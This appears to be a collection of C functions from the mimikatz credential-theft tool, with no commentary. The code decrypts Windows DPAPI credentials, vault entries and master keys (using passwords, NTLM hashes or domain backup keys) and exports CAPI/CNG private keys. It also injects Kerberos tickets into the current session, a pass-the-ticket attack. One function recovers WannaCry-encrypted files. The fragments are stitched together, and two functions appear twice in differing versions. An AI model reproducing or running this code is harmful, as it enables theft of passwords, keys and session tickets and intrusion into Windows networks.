NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[]) { PCWSTR infile; PVOID file, out; DWORD szFile, szOut; PKULL_M_CRED_BLOB cred; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { kull_m_dpapi_blob_quick_descr(0, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Credential:\n")) { if(cred = kull_m_cred_create(out)) { kull_m_cred_descr(0, cred); kull_m_cred_delete(cred); } LocalFree(out); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CRED file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataF; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF)) { kprintf(L" * AccessString : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * SubscriberID : "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); kprintf(L"\n"); kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[]) { PBYTE file; PVOID out; DWORD szFile, outLen, cbProperties; PKULL_M_KEY_CNG_BLOB cngKey; PKULL_M_KEY_CNG_PROPERTY * properties; LPCWSTR infile; PWSTR name; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { if(cngKey = kull_m_key_cng_create(file)) { kull_m_key_cng_descr(0, cngKey); if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateProperties, cngKey->dwPrivatePropertiesLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES), &out, &outLen, L"Decrypting Private Properties:\n")) { if(kull_m_key_cng_properties_create(out, outLen, &properties, &cbProperties)) { kull_m_key_cng_properties_descr(0, properties, cbProperties); kull_m_key_cng_properties_delete(properties, cbProperties); } LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateKey, cngKey->dwPrivateKeyLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB), &out, &outLen, L"Decrypting Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0);kprintf(L"\n"); if(name = (PWSTR) LocalAlloc(LPTR, cngKey->dwNameLen + sizeof(wchar_t))) { RtlCopyMemory(name, cngKey->pName, cngKey->dwNameLen); kuhl_m_crypto_exportRawKeyToFile(out, outLen, TRUE, L"raw", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(out); } kull_m_key_cng_delete(cngKey); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CNG private key file needed (/in:file)\n"); return STATUS_SUCCESS; }
void kuhl_m_kerberos_ptt_file(PCWCHAR filename) { PBYTE fileData; DWORD fileSize; NTSTATUS status; if(kull_m_file_readData(filename, &fileData, &fileSize)) { status = kuhl_m_kerberos_ptt_data(fileData, fileSize); if(NT_SUCCESS(status)) kprintf(L"OK\n"); else PRINT_ERROR(L"LsaCallKerberosPackage %08x\n", status); LocalFree(fileData); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); }
NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[]) { PBYTE fileData; DWORD fileSize; if(argc) { if(kull_m_file_readData(argv[argc - 1], &fileData, &fileSize)) { if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(fileData, fileSize))) kprintf(L"Ticket \'%s\' successfully submitted for current session\n", argv[0]); LocalFree(fileData); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Missing argument : ticket filename\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_masterkeys(int argc, wchar_t * argv[]) { PKULL_M_DPAPI_MASTERKEYS masterkeys; PBYTE buffer; DWORD szBuffer; if(argc && kull_m_file_readData(argv[0], &buffer, &szBuffer)) { if(masterkeys = kull_m_dpapi_masterkeys_create(buffer)) { kull_m_dpapi_masterkeys_descr(masterkeys); kull_m_dpapi_masterkeys_delete(masterkeys); } LocalFree(buffer); } return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[]) { PKULL_M_DPAPI_BLOB blob; PBYTE buffer; DWORD szBuffer; if(argc && kull_m_file_readData(argv[0], &buffer, &szBuffer)) { if(blob = kull_m_dpapi_blob_create(buffer)) { kull_m_dpapi_blob_descr(blob); kull_m_dpapi_blob_delete(blob); } LocalFree(buffer); } return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[]) { PCWSTR infile; PVOID file, out; DWORD szFile, szOut; BOOL isNT5Cred; PKULL_M_CRED_BLOB cred; PKULL_M_CRED_LEGACY_CREDS_BLOB legacyCreds; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { isNT5Cred = RtlEqualGuid((PBYTE) file + sizeof(DWORD), &KULL_M_DPAPI_GUID_PROVIDER); kull_m_dpapi_blob_quick_descr(0, isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, isNT5Cred ? szFile : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, isNT5Cred ? L"Decrypting Legacy Credential(s):\n" : L"Decrypting Credential:\n")) { if(isNT5Cred) { if(legacyCreds = kull_m_cred_legacy_creds_create(out)) { kull_m_cred_legacy_creds_descr(0, legacyCreds); kull_m_cred_legacy_creds_delete(legacyCreds); } } else { if(cred = kull_m_cred_create(out)) { kull_m_cred_descr(0, cred); kull_m_cred_delete(cred); } } LocalFree(out); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CRED file needed (/in:file)\n"); return STATUS_SUCCESS; }
void rsautil_decryptFileWithKey(HCRYPTPROV hProv, HCRYPTKEY hUserRsaKey, HCRYPTKEY hFreeRsaKey, LPWSTR filename) { HCRYPTKEY hUserFileAesKey; PWANA_FORMAT pbEncData; PWCHAR p; DWORD cbEncData, cbRealDataLen, cryptoMode = CRYPT_MODE_CBC; kprintf(L"File %s -- ", filename); if(kull_m_file_readData(filename, (PBYTE *) &pbEncData, &cbEncData)) { if(p = wcsrchr(filename, L'.')) { *p = L'\0'; // 'delete' the WNCRY extension if(pbEncData->magic == WANA_MAGIC) { if(CryptDecrypt(hUserRsaKey, 0, TRUE, 0, pbEncData->key, &pbEncData->enc_keysize) || (hFreeRsaKey ? CryptDecrypt(hFreeRsaKey, 0, TRUE, 0, pbEncData->key, &pbEncData->enc_keysize) : FALSE)) // decrypt the raw AES key from your RSA key (from userone of free if present) { if(SIMPLE_kull_m_crypto_hkey(hProv, CALG_AES_128, pbEncData->key, pbEncData->enc_keysize, 0, &hUserFileAesKey)) // let's make a AES 128 Windows key from raw bytes { if(CryptSetKeyParam(hUserFileAesKey, KP_MODE, (PBYTE) &cryptoMode, 0)) // we'll do CBC { cbRealDataLen = cbEncData - FIELD_OFFSET(WANA_FORMAT, data); if(CryptDecrypt(hUserFileAesKey, 0, FALSE, 0, pbEncData->data, &cbRealDataLen)) // decrypt final data (padding issue, so 'FALSE' arg) { if(kull_m_file_writeData(filename, pbEncData->data, (ULONG) pbEncData->qwDataSize)) kprintf(L"OK\n"); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); } else PRINT_ERROR_AUTO(L"CryptDecrypt(AES)"); } CryptDestroyKey(hUserFileAesKey); } } else PRINT_ERROR_AUTO(L"CryptDecrypt(RSA)"); } else PRINT_ERROR(L"ERROR: WANACRY! magic number not found\n"); } else PRINT_ERROR(L"ERROR: no \'.\' at the end of the user file ?\n"); LocalFree(pbEncData); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); }
BOOL rsautil_pubkeyfile_to_new_e_n(PCWSTR filename, BIGNUM **e, BIGNUM **n) { BOOL status = FALSE; PBYTE blob; DWORD cbBlob; RSA *rsa; if(kull_m_file_readData(filename, &blob, &cbBlob)) { if(status = rsautil_pubkeyblob_to_rsa(blob, cbBlob, &rsa)) { *e = BN_new(); *n = BN_new(); BN_copy(*e, rsa->e); BN_copy(*n, rsa->n); RSA_free(rsa); } LocalFree(blob); } else PRINT_ERROR_AUTO(L"fileutil_readData"); return status; }
NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[]) { NTSTATUS status, packageStatus; PBYTE fileData; DWORD fileSize, submitSize, responseSize; PKERB_SUBMIT_TKT_REQUEST pKerbSubmit; PVOID dumPtr; if(argc) { if(kull_m_file_readData(argv[argc - 1], &fileData, &fileSize)) { submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + fileSize; if(pKerbSubmit = (PKERB_SUBMIT_TKT_REQUEST) LocalAlloc(LPTR, submitSize)) { pKerbSubmit->MessageType = KerbSubmitTicketMessage; pKerbSubmit->KerbCredSize = fileSize; pKerbSubmit->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST); RtlCopyMemory((PBYTE) pKerbSubmit + pKerbSubmit->KerbCredOffset, fileData, pKerbSubmit->KerbCredSize); status = LsaCallKerberosPackage(pKerbSubmit, submitSize, &dumPtr, &responseSize, &packageStatus); if(NT_SUCCESS(status)) { if(NT_SUCCESS(packageStatus)) kprintf(L"Ticket \'%s\' successfully submitted for current session\n", argv[0]); else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbSubmitTicketMessage / Package : %08x\n", packageStatus); } else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbSubmitTicketMessage : %08x\n", status); LocalFree(pKerbSubmit); } LocalFree(fileData); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Missing argument : ticket filename\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[]) { PCWSTR inFilePolicy, inFileCred; PVOID filePolicy, fileCred, out; DWORD szFilePolicy, szFileCred, szOut, len, i, mode = CRYPT_MODE_CBC; BYTE aes128[AES_128_KEY_SIZE], aes256[AES_256_KEY_SIZE]; PKULL_M_CRED_VAULT_POLICY vaultPolicy; PKULL_M_CRED_VAULT_CREDENTIAL vaultCredential; PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute; PKULL_M_CRED_VAULT_CLEAR clear; PVOID buffer; BOOL isAttr; HCRYPTPROV hProv; HCRYPTKEY hKey; if(kull_m_string_args_byName(argc, argv, L"cred", &inFileCred, NULL)) { if(kull_m_file_readData(inFileCred, (PBYTE *) &fileCred, &szFileCred)) { if(vaultCredential = kull_m_cred_vault_credential_create(fileCred)) { kull_m_cred_vault_credential_descr(0, vaultCredential); if(kull_m_string_args_byName(argc, argv, L"policy", &inFilePolicy, NULL)) { if(kull_m_file_readData(inFilePolicy, (PBYTE *) &filePolicy, &szFilePolicy)) { if(vaultPolicy = kull_m_cred_vault_policy_create(filePolicy)) { kull_m_cred_vault_policy_descr(0, vaultPolicy); if(kuhl_m_dpapi_unprotect_raw_or_blob(vaultPolicy->key->KeyBlob, vaultPolicy->key->dwKeyBlob, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Policy Keys:\n")) { if(kull_m_cred_vault_policy_key(out, szOut, aes128, aes256)) { kprintf(L" AES128 key: "); kull_m_string_wprintf_hex(aes128, AES_128_KEY_SIZE, 0); kprintf(L"\n"); kprintf(L" AES256 key: "); kull_m_string_wprintf_hex(aes256, AES_256_KEY_SIZE, 0); kprintf(L"\n\n"); if(CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { for(i = 0; i < vaultCredential->__cbElements; i++) { if(attribute = vaultCredential->attributes[i]) { kprintf(L" > Attribute %u : ", attribute->id); if(attribute->data && (len = attribute->szData)) { if(buffer = LocalAlloc(LPTR, len)) { RtlCopyMemory(buffer, attribute->data, len); if(kuhl_m_dpapi_vault_key_type(attribute, hProv, aes128, aes256, &hKey, &isAttr)) { if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) buffer, &len)) { if(isAttr) { kull_m_string_wprintf_hex(buffer, len, 0); } else { kprintf(L"\n"); if(!attribute->id || (attribute->id == 100)) { if(clear = kull_m_cred_vault_clear_create(buffer)) { kull_m_cred_vault_clear_descr(1, clear); kull_m_cred_vault_clear_delete(clear); } } else kull_m_string_wprintf_hex(buffer, len, 1 | (16 << 16)); kprintf(L"\n"); } } else PRINT_ERROR_AUTO(L"CryptDecrypt"); } LocalFree(buffer); } } kprintf(L"\n"); } } CryptReleaseContext(hProv, 0); } } LocalFree(out); } kull_m_cred_vault_policy_delete(vaultPolicy); } LocalFree(filePolicy); } else PRINT_ERROR_AUTO(L"kull_m_file_readData (policy)"); } kull_m_cred_vault_credential_delete(vaultCredential); } LocalFree(fileCred); } else PRINT_ERROR_AUTO(L"kull_m_file_readData (cred)"); } else PRINT_ERROR(L"Input Cred file needed (/cred:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[]) { PVOID file, out; PRSA_GENERICKEY_BLOB blob; DWORD szFile, outLen, szBlob; PKULL_M_KEY_CAPI_BLOB capiKey; LPCWSTR infile; PWSTR name; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile)) { if(capiKey = kull_m_key_capi_create(file)) { kull_m_key_capi_descr(0, capiKey); if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob)) { if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName)) { kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(blob); } LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); LocalFree(out); } if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n")) { kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n"); if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob)) { if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName)) { kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE); LocalFree(name); } LocalFree(blob); } LocalFree(out); } kull_m_key_capi_delete(capiKey); } LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]) { PKULL_M_DPAPI_MASTERKEYS masterkeys; PBYTE buffer; PPVK_FILE_HDR pvkBuffer; DWORD szBuffer, szPvkBuffer; LPCWSTR szIn = NULL, szSid = NULL, szPassword = NULL, szHash = NULL, szSystem = NULL, szDomainpvk = NULL; BOOL isProtected = kull_m_string_args_byName(argc, argv, L"protected", NULL, NULL); PWSTR convertedSid = NULL; PSID pSid; PBYTE pHash = NULL, pSystem = NULL; DWORD cbHash = 0, cbSystem = 0; PVOID output; DWORD cbOutput; if(kull_m_string_args_byName(argc, argv, L"in", &szIn, NULL)) { kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL); kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL); kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL); kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL); kull_m_string_args_byName(argc, argv, L"domainpvk", &szDomainpvk, NULL); if(kull_m_file_readData(szIn, &buffer, &szBuffer)) { if(masterkeys = kull_m_dpapi_masterkeys_create(buffer)) { //kull_m_dpapi_masterkeys_descr(masterkeys); if(szSid) { if(ConvertStringSidToSid(szSid, &pSid)) { ConvertSidToStringSid(pSid, &convertedSid); LocalFree(pSid); } else PRINT_ERROR_AUTO(L"ConvertStringSidToSid"); } if(szHash) kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash); if(szSystem) kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem); if(convertedSid) { if(masterkeys->MasterKey && masterkeys->dwMasterKeyLen) { if(szPassword) { kprintf(L"\n[masterkey] with password: %s (%s user)\n", szPassword, isProtected ? L"protected" : L"normal"); if(kull_m_dpapi_unprotect_masterkey_with_password(masterkeys->dwFlags, masterkeys->MasterKey, szPassword, convertedSid, isProtected, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_password\n"); } if(pHash) { kprintf(L"\n[masterkey] with hash: "); kull_m_string_wprintf_hex(pHash, cbHash, 0); if(cbHash == LM_NTLM_HASH_LENGTH) kprintf(L" (ntlm type)\n"); else if(cbHash == SHA_DIGEST_LENGTH) kprintf(L" (sha1 type)\n"); else kprintf(L" (?)\n"); if(kull_m_dpapi_unprotect_masterkey_with_userHash(masterkeys->MasterKey, pHash, cbHash, convertedSid, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_userHash\n"); } } if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen) { if(!(masterkeys->dwFlags & 1) || (pSystem && cbSystem)) { kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); if(pSystem) kull_m_string_wprintf_hex(pSystem, cbSystem, 0); kprintf(L"\n"); if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); } } LocalFree(convertedSid); } if(pHash) LocalFree(pHash); if(pSystem) LocalFree(pSystem); if(szDomainpvk && masterkeys->DomainKey && masterkeys->dwDomainKeyLen) { kprintf(L"\n[domainkey] with RSA private key\n"); if(kull_m_file_readData(szDomainpvk, (PBYTE *) &pvkBuffer, &szPvkBuffer)) { if(kull_m_dpapi_unprotect_domainkey_with_key(masterkeys->DomainKey, (PBYTE) pvkBuffer + sizeof(PVK_FILE_HDR), pvkBuffer->cbPvk, &output, &cbOutput, &pSid)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, pSid); else PRINT_ERROR(L"kull_m_dpapi_unprotect_domainkey_with_key\n"); LocalFree(pvkBuffer); } } kull_m_dpapi_masterkeys_delete(masterkeys); } LocalFree(buffer); } } else PRINT_ERROR(L"Input masterkeys file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_unprotect(int argc, wchar_t * argv[]) { DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL}; PKULL_M_DPAPI_BLOB blob; PCWSTR szEntropy, outfile, infile, szMasterkey, szPassword = NULL; PWSTR description = NULL; CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt; DWORD flags = 0; UNICODE_STRING uString; BOOL statusDecrypt = FALSE; PBYTE masterkey = NULL; DWORD masterkeyLen = 0; if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL)) kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData); if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL)) flags |= CRYPTPROTECT_LOCAL_MACHINE; pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL; if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL)) kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen); kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL); kprintf(L"\nflags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n"); kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n"); kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n"); kprintf(L"masterkey : "); kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0); kprintf(L"\n"); kprintf(L"password : %s\n\n", szPassword ? szPassword : L""); if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &dataIn.pbData, &dataIn.cbData)) { if(blob = kull_m_dpapi_blob_create(dataIn.pbData)) { kull_m_dpapi_blob_descr(blob); if(masterkey && masterkeyLen) statusDecrypt = kull_m_dpapi_unprotect_blob(blob, masterkey, masterkeyLen, dataEntropy.pbData, dataEntropy.cbData, szPassword, (LPVOID *) &dataOut.pbData, &dataOut.cbData); else statusDecrypt = CryptUnprotectData(&dataIn, &description, &dataEntropy, NULL, pPrompt, 0, &dataOut); if(statusDecrypt) { if(description) { kprintf(L"description : %s\n", description); LocalFree(description); } if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL)) { if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData)) kprintf(L"Write to file \'%s\' is OK\n", outfile); } else { uString.Length = uString.MaximumLength = (USHORT) dataOut.cbData; uString.Buffer = (PWSTR) dataOut.pbData; kprintf(L"data - "); if((uString.Length <= USHRT_MAX) && (kull_m_string_suspectUnicodeString(&uString))) kprintf(L"text : %s", dataOut.pbData); else { kprintf(L"hex : "); kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, 1 | (16 << 16)); } kprintf(L"\n"); } LocalFree(dataOut.pbData); } else if(!masterkey) PRINT_ERROR_AUTO(L"CryptUnprotectData"); kull_m_dpapi_blob_delete(blob); } LocalFree(dataIn.pbData); } } if(dataEntropy.pbData) LocalFree(dataEntropy.pbData); if(masterkey) LocalFree(masterkey); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave) { PBYTE file, data; DWORD length, i; USHORT version; PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm; PKIWI_KERBEROS_TICKET ticket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; DWORD App_KrbCred_Size; wchar_t * saveFilename; if(argc) { if(kull_m_file_readData(argv[0], &file, &length)) { data = file; version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(version == 0x0504) { data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data); kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm); if(principalName) { kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm); for(i = 0; data < (file + length); i++) { kprintf(L"\n\nData %u", i); if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET))) { kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName); kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName); ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName); kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName); ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(ticket->Key.Length) if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length)) RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length); data += ticket->Key.Length + sizeof(DWORD); // authtime; kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ? kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD); kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); ticket->TicketKvno = 2; if(ticket->Ticket.Length) if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length)) RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length); data += ticket->Ticket.Length; kuhl_m_kerberos_ccache_skip_buffer(&data); if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE)) { kuhl_m_kerberos_ticket_display(ticket, FALSE); if(isSave || isInject) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE)) { App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred); if(isInject) { kprintf(L"\n\t * Injecting ticket : "); if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size))) kprintf(L"OK\n"); } else { if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT)) { if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size)) kprintf(L"\n\t * Saved to file %s !", saveFilename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(saveFilename); } } LocalFree(App_KrbCred); } } } else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF); kuhl_m_kerberos_ticket_freeTicket(ticket); } } kuhl_m_kerberos_ticket_freeExternalName(principalName); } } else PRINT_ERROR(L"ccache version != 0x0504\n"); LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"At least one filename is needed\n"); return STATUS_SUCCESS; }
